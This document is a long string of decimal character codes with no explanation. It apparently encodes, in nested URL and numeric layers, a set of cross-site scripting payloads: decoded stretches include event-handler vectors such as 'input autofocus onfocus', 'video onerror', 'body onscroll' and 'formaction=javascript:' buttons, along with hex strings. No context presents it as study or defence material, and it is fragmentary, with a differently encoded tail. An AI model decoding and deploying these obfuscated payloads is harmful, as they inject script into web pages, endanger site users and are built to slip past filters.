0,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,52,53,37,50,53,50,67,52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50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56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6,56,37,50,53,50,67,55,55,37,50,53,50,67,55,54,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,55,51,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,54,55,37,50,53,50,67,54,56,37,50,53,50,67,54,53,37,50,53,50,67,56,52,37,50,53,50,67,54,53,37,50,53,50,67,57,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,57,51,37,50,53,50,67,57,51,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,50,48,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,56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0,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,52,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48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7,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,56,5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9,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56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3,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,54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7,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,54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4,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55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49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,52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5,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,53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7,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55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8,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52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49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,51,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,53,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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6,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52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2,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,52,55,37,50,53,50,67,52,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57,56,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,50,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53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57,56,37,50,53,50,67,49,49,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,53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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54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3,54,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57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6,56,37,50,53,50,67,54,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,57,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,54,49,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,54,49,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,54,50,37,50,53,50,67,56,5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6,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52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3,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,51,52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54,48,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,49,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,6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50,37,51,101,37,51,51,37,54,53,37,51,52,37,54,52,37,54,51,37,54,54,37,51,51,37,54,49,37,51,55,37,51,48,37,54,50,37,51,50,37,51,49,37,51,52,37,51,53,37,54,51,37,54,54,37,54,51,37,51,48,37,51,51,37,54,49,37,51,52,37,51,57,37,51,54,37,51,49,37,51,48,37,5